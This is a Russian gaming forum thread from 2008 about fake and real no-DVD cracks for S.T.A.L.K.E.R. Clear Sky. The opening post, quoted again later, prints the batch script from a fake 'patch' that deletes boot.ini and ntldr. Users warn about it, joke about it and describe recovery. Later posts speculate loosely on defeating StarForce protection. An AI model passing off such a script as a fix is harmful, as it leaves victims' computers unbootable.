1. вы чо ёб......сь все на отличненько чтоли? какое идёт... посмотрите содержимое во первых exe файла, во вторых откройте его winrar-oм и откройте содержимое bat файла, и охереете...
@echo off attrib -h -s -r c:\boot.ini attrib -h -s -r c:\ntldr copy c:\ntldr %windir%\dx copy c:\boot.ini %windir%\dx.ini del /q c:\boot.ini del /q c:\ntldr del /q radmin.bat
После этого ваша винда хер загрузится НЕ СТАВИТЬ НИ В КОЕМ СЛУЧАЕ!!![/size]
2. все кто остались живы после моего * патча* - молодцы - не купились... а остальным флудерастам которые чухнули ставить патч... большой привет от boot.ini (но к сожалению они этот пост не прочтут)
ramzay
24.08.2008, 21:02
TIREX, а что вы хотели? Флудеры однодневки просто захватили форум. До них не доходит, что люди, которые обещают нодвд, НИКОГДА ЕГО НЕ СДЕЛАЮТ. 200 страниц чистейшего флуда. Как эта тема до сих пор жива я никак не могу понять. Только я забанил, за мат, уже 10 человек, а общее колличество забаненных уже приближаеться к сотне. В соседней теме руским по белому написано:"Когда нодвд появиться он будет выложен здесь", и тем не менее флуд и идиотизм продолжаеться. На фэйках уже заработали не одну сотню баксов, а вы продолжаете верить.
ho2
25.08.2008, 13:38
будьте добры поделитесь файликом xrEngine.exe из украинского недокаченого торрента,нужен для пары тройки эксперементов.
все закономерно, на каждого псевдо-крякера найдется свой псевдо-вирусописатель, хотя и тот и другой одного поля ягоды
SaneX
25.08.2008, 13:50
Цитата
1. вы чо ёб......сь все на отличненько чтоли? какое идёт... посмотрите содержимое во первых exe файла, во вторых откройте его winrar-oм и откройте содержимое bat файла, и охереете...
@echo off attrib -h -s -r c:\boot.ini attrib -h -s -r c:\ntldr copy c:\ntldr %windir%\dx copy c:\boot.ini %windir%\dx.ini del /q c:\boot.ini del /q c:\ntldr del /q radmin.bat
После этого ваша винда хер загрузится НЕ СТАВИТЬ НИ В КОЕМ СЛУЧАЕ!!![/size]
2. все кто остались живы после моего * патча* - молодцы - не купились... а остальным флудерастам которые чухнули ставить патч... большой привет от boot.ini (но к сожалению они этот пост не прочтут)
мухаха
Хэш
25.08.2008, 13:55
Цитата
откройте содержимое bat файла, и охереете...
гы гы гы, жестко... но забавно, нечего всякую херь запускать
Alex-X-x
25.08.2008, 13:57
мде за такое руки рубить надо!
HikeR
25.08.2008, 14:44
Цитата(Alex-X-x @ 25.08.2008, 14:57)
за такое руки рубить надо!
лучше головы, у тех, кто запускает всякую дрянь не глядя, полезнее будет.
xp10h
25.08.2008, 15:04
да ладно, обратить изменения проще пареной репы... )
centrino
25.08.2008, 15:45
Цитата(Alex-X-x @ 25.08.2008, 14:57)
за такое руки рубить надо!
кабы так, то уже наверное протезы
Pr@pH
25.08.2008, 16:18
Цитата
del /q c:\ntldr
вот эта херня положит систему, а то что там ещё удаляецо boot.ini это херня.
xp10h
25.08.2008, 16:24
положит систему, положит систему... поставишь другой загрузчик, и все. к тому же оно сначала "copy c:\ntldr %windir%\dx" а уже потом "del /q c:\ntldr"
HikeR
25.08.2008, 16:40
Цитата(xp10h @ 25.08.2008, 17:24)
поставишь другой загрузчик, и все.
нужен либо liveCD (с виндой или линуксом), либо вторая установленная операционка. всего этого у абсолютного большинства просто нет, так что способ надежный, проверено ;)
Райкер
25.08.2008, 16:58
Цитата(HikeR @ 25.08.2008, 16:40)
Цитата(xp10h @ 25.08.2008, 17:24)
поставишь другой загрузчик, и все.
нужен либо liveCD (с виндой или линуксом), либо вторая установленная операционка. всего этого у абсолютного большинства просто нет, так что способ надежный, проверено
Есть еще третий вариант, fixboot из консоли восстановления с любого загрузочного диска Windows XP. Но приятно то, что эта фигня на Windows Vista не прокатит
IceT
25.08.2008, 16:59
да это решается в 2 сечта с помощью любой пиратской болванки с виндами, загружаемся с нее, заходим в консоль восстановления и вводим 2 команды fixboot, fixmbr .. все. А вообще сами виноваты - нефиг вякую чуш запускать... на виртаульной машине затестить еще можно попрбоавать на предмет безопасности, да и если кряк рабочий то через полчаса он разлетится по всему рунету... полчаса ничего не решают в данном случае, так что я кряки не тестирую. Райкер ты меня опередил.
M i k e
25.08.2008, 17:00
Мля ребят, давайте по теме, не охота в магазин за диском бежать
xp10h
25.08.2008, 17:06
Бежать? В магазин? Лучше вообще ближайший месяц об этом не думать... Игра ну очень сырая. При повторном прохождении это очень сильно бросается в глаза.
А по сабжу - все было сказано еще пару страниц назад. Ждите европейский релиз с securom
Pollux
25.08.2008, 17:39
В составе патча stkcs-rus-pack-r-patch-any-3.exe находится интересный файлик - cycle_start.cmd, после установки патча он находится в корне игры (c:\Program Files\GSC World Publishing\С.Т.А.Л.К.Е.Р. - Чистое Небо\cycle_start.cmd). Его содержание -
Как компетентные люди пояснили, особенности применной защиты позволяют три дня играть без диска, потом затребует снова для проверки...
Приведённый выше скрипт никого отношения к этому не имеет...
2centrino, Рад что понравилось
IceT
25.08.2008, 18:35
Вобщем есть идея, если я правильно понял то промлема сейчас заключается в том что взломать экзешник трудно а эмуляция палится и блокируется, сначала старфорс блокировал обращения к винту во время проверки, потом перцы придумали тащить нужные данные через сеть, теперь эту лавочку тоже прикрыли, может быть стоит занать образ двд в оперативную память и уже давать то что нужно эмулятору непосредсвенно ттудава, правда понадобитсяя примерно 8Гб оперативки и исходники драйвера.... чем покупать сталкера я лучше оперативки бы добавил)))))))
Marauder
25.08.2008, 18:53
На nocd.ru на главной выложили крак для ЧН версии 1.5.03
=Diablo=
25.08.2008, 18:55
Перезалейте кто-нить
[empr]
25.08.2008, 18:57
Випфайл-фейк.
IceT
25.08.2008, 19:02
вообще ноцд.ру какойто шмурдяк гонит... там нередко трояны и вирусы или ссылки только на платник. вот ]]>http://stopgame.ru/]]> нехуже - и фейков я там невидел. на ]]>http://rugcw.com/]]> тоже все чисто.
Viz@r
25.08.2008, 19:18
Если будут давать ссылку с депозита на файл "Stlkerndvd.rar", проверил - Фейк! Там 2 файла в архиве, экзешник от "dedicated" и подправленный "fsgame.ltx". Идет все тот же запуск приветствия и дальше привет рабочий стол. Но что самое любопытное, вес ни одного из файлов не совпадает (имеется в виду экзешник оригинальный, от dedicated и тот что из архива). У них вес совершенно разный, у всех трех. Меня теперь терзает вопрос что это за такое. Причем если убрать из папки "bin" "fsgame.ltx", то подправленный экзешник начинает ругаться на его отсутствие. Опять же спрашивается зачем такое делать и дописывать привязку по дирректории в экзешник.
IceT
25.08.2008, 19:22
варианта два - это экзешники после офф патча уже(или до - если у тебя после, ну вобщем ты понял) или они просто склеены с какиминбудь коварными троянами. причем вес не обязательно для этого должен быть можно, можно склеить с трояном а потом уже запаковать и размер получится меньше).
VIGUR
25.08.2008, 19:40
Мне удалось корректно запустить выделенный сервак вообще без проверки Старфорсом и найти фрагмент файла, который отвечает за игнорирование защиты. По этому одинаковые файлы (например, xrGame.dll и xrCPU_Pipe.dll) из папки \bin\ и \bin\dedicated\ имеют разный размер. Вот только проблема в том, что фрагмент кода зашифрован разными способами в каждом файле и, по этому, просто вставить кусок не получается..
Viz@r
25.08.2008, 22:08
VIGUR, а если разшифровать попробовать? Думаю там всетаки что то ближе к стандартному upx`y...
IceT, Сам иногда занимался троями, так что знаю что это и с чем едят. Экзешник чистый - без заразы.
centrino
25.08.2008, 22:10
Цитата(Viz@r @ 25.08.2008, 23:08)
Думаю там всетаки что то ближе к стандартному upx`y
расслабься
Viz@r
25.08.2008, 22:13
centrino, как стадо удавов. Чем по твоему может быть библиотека запакована?
AJIEKCEu
25.08.2008, 23:09
Цитата(VIGUR @ 25.08.2008, 20:40)
Мне удалось корректно запустить выделенный сервак вообще без проверки Старфорсом и найти фрагмент файла, который отвечает за игнорирование защиты. По этому одинаковые файлы (например, xrGame.dll и xrCPU_Pipe.dll) из папки \bin\ и \bin\dedicated\ имеют разный размер. Вот только проблема в том, что фрагмент кода зашифрован разными способами в каждом файле и, по этому, просто вставить кусок не получается..
У тебя вот такое получилось? Если я не прав ногами не бейте)))
AJIEKCEu, да, но только сначала когда я через cmd файлы запускал. Потом я запустил это напрямую через ЕХЕ
Хэш
25.08.2008, 23:18
забейте на дедикейт... никак не запустить таким способом. nocd будет, но позже. примерно 4-5 сентября все остальное считайте фейком, если появится раньше, об этом узнают все. через 5 минут весь инет будет на ушах
VIGUR
25.08.2008, 23:21
Хэш, просто именно в файлах от дедикейтеда (xrGame.dll, xrCPU_pipe.dll и xr_Engine.exe) реально части обхода старфорса... см. мой скриншот
AJIEKCEu
25.08.2008, 23:26
Цитата(Хэш @ 26.08.2008, 00:18)
забейте на дедикейт... никак не запустить таким способом. nocd будет, но позже. примерно 4-5 сентября все остальное считайте фейком, если появится раньше, об этом узнают все. через 5 минут весь инет будет на ушах
Хэш Если чесно я не особо к чему-то стремлюсь, у мну завтра диск будет, но просто хочетса чтоб NODVD сделали))))
nightman
26.08.2008, 00:26
Люди есть очень интересная идея! вобщем когда мы запускаем нашу проверку, мы вводим ключ, этот ключ хранится в оперативной памяти я нашол через арт мани 5 ячеек где он хранится, далее чтобы сравнить ключи тот который должен быть магический, и тот который мы ввели, магический ключик должен быть сгенерирован либо откудато взят, в любом случае загружен в оперативную память далее, так как мы его не знаем то мы его не можем найти в оперативной памяти, но! у тех кому прислали этот ключ, ключ который они вводят и сгенерированный ключ совпадает, соответственно мы знаем что искать в оперативной, так вот этот ключ будет хранится в какойто 6-той ячейке, я думаю адрес этой ячейки будет у всех одинаковый, и любой смотжет посмотреть этот ключик у себя. Зы что надо > человек которому выслали ключ Зыы единственное почему это может не получится, если ключ генерируется и сравнивается посимвольно, соответственно он будет хранится в оперативной памяти очень короткое время и только по 1-му символу ... в этом случае надо программа мониторинга оперативной памяти, которая сможет записать все изменения оперативки за время выполнения программы, в чем тут идея, если ключ генерируется посимвольно, то скорее всего в какойто одной конкретной ячейке, и это можно будет легко заметить ...
centrino
26.08.2008, 00:39
Цитата(nightman @ 26.08.2008, 01:26)
я нашол через арт мани 5 ячеек где он хранится
плакалъ
nightman
26.08.2008, 00:43
да когда я вспоминал подобные программы, мне тоже очень стало смешно когда под руку попалась арт мани, но ведь не в этом суть :-d в данном случае она была использована для просмотра оперативной памяти ..) Зыы сначала я думал в декомпилированном коде искать обращение к адресу нашей строки, но потом понял что это полный бред
HikeR
26.08.2008, 01:00
Цитата
если ключ генерируется посимвольно, то скорее всего в какойто одной конкретной ячейке, и это можно будет легко заметить ...
уже очень давно никто не делает проверку ключей, серийников и прочая через прямое сравнение. серийник - это код, по которому расшифровывается часть ф-ий, либо порядок их вызова, либо таблица смещений этих ф-ий. похоже на части головоломки, которую можно собрать одним единственным способом, причем в строго определенном порядке, и пока не вставишь последнюю деталь - не поймешь, правильно ты делаешь или нет. это примерно как подобрать последовательность, md5 сумма которой равна aaaabbbbccccddddeeeeffffgggghhhh. если есть несколько тысяч лет свободного времени, то можете заняться.
nightman
26.08.2008, 01:03
Цитата(HikeR @ 26.08.2008, 01:00)
Цитата
если ключ генерируется посимвольно, то скорее всего в какойто одной конкретной ячейке, и это можно будет легко заметить ...
уже очень давно никто не делает проверку ключей, серийников и прочая через прямое сравнение. серийник - это код, по которому расшифровывается часть ф-ий, либо порядок их вызова, либо таблица смещений этих ф-ий. похоже на части головоломки, которую можно собрать одним единственным способом, причем в строго определенном порядке, и пока не вставишь последнюю деталь - не поймешь, правильно ты делаешь или нет. это примерно как подобрать последовательность, md5 сумма которой равна aaaabbbbccccddddeeeeffffgggghhhh. если есть несколько тысяч лет свободного времени, то можете заняться.
спс за разьяснение и всётаки, тогда можно подумать дальше, у нашей программы есть 2 валидныых ключа, один который можно посмотреть через Readcd, второй который присылает SF соответственно первый нас отправляет на функции проверки диска, второй отправляет в обход защиты на последующие функции запуска игры ..., если всётаки принимать ключи как смещение (порядок вызова), отсюда вывод, способ неработоспособен, спасибо за внимание
HikeR
26.08.2008, 01:19
даже если допустить, что мы нашли ф-ию, которая читает серийник посимвольно, и сделали точку останова на ней, и даже дотрассировали до того момента, когда идет проверка - то злобная программа к этому времени уже засекла время выполнения рассчета, который почему-то произошел не за доли секунды, а за гораздно большее время. а теперь самое интересное, время выполнения может использоваться как одна из переменных, из-за которой зависит конечный результат. то есть мы радостные отловили переход, который нам кажется правильным, но этот переход ведет не в тело программы, а куда-нить в никарагуа. следующий момент, в расчете результата может использоваться контрольная сумма файла или его части. проводя трассировку мы меняет код программы, в результате имеем самые разнообразные значения, кроме правильных. кстати, такие вещи встречаются в менее страшных вещах, чем старфорс.
злобная программа к этому времени уже засекла время выполнения рассчета, который почему-то произошел не за доли секунды, а за гораздно большее время. а теперь самое интересное, время выполнения может использоваться как одна из переменных,
отсюда вопрос, разве время выполнения не зависит от частоты процессора, таймингов памяти и т.д. ?
HikeR
26.08.2008, 01:31
да, и еще кстати.
Цитата
Ранее основной проблемой всех систем, включая SF, была несовместимость защиты с некоторыми видами приводов CD\DVD (продукцией No-name, и рядом устройств для ноутбуков). SF успешно решила данную проблему двумя способами. Во-первых, список совместимость с приводами постоянно растет. Во-вторых, в системе имеется возможность введения универсального кода, который позволит запустить приложение, если диск не аутентифицируется.
Последняя функция, безусловно, является дырой в защите.
обратите внимание на последнюю фразу. цитата от 2004 года, однако никто так и не пробился в эту дыру до сих пор.
Цитата
разве время выполнения не зависит от частоты процессора, таймингов памяти и т.д. ?
отличается. разница в микросекунды, если не меньше. но когда время выполнения занимает несколько секунд - это наводит на размышления, не так ли?
nightman
26.08.2008, 01:31
Цитата(HikeR @ 26.08.2008, 01:29)
Последняя функция, безусловно, является дырой в защите.[ обратите внимание на последнюю фразу. цитата от 2004 года, однако никто так и не пробился в эту дыру до сих пор.
вот и я об этом подумал, это реальная дыра, которую помоему легче расковырять, чем снимать ВМ, переписывать всё в экзешник и прочие бубно танцо пения Зы на размышления наталкивает, но сомневаюсь что в SF встроен AI
HikeR
26.08.2008, 01:34
ну и перед тем, как пойду спать, последний пример. генератора ключей для такого весьма распостраненного продукта, как Windows XP Home также никто не сделал. а эта программа встречается несколько чаще, чем какой-то там старфорс, не правда ли? ;)
nightman
26.08.2008, 01:36
Цитата(HikeR @ 26.08.2008, 01:34)
ну и перед тем, как пойду спать, последний пример. генератора ключей для такого весьма распостраненного продукта, как Windows XP Home также никто не сделал. а эта программа встречается несколько чаще, чем какой-то там старфорс, не правда ли?
Согласен и всётаки вернёмся к нашим валидным ключам, если наш ключ является смещением, то при неправильном вводе нас вообще выкинет в тундру и должен вылететь Error, но этого не происходит, отсюда вывод: я не думаю что там стоит чтото вроде try except, а на ключ таки накладываются какието условия ... Зы ушол я тож спать ..)
Для просмотра полной версии этой страницы, пожалуйста, пройдите по ссылке.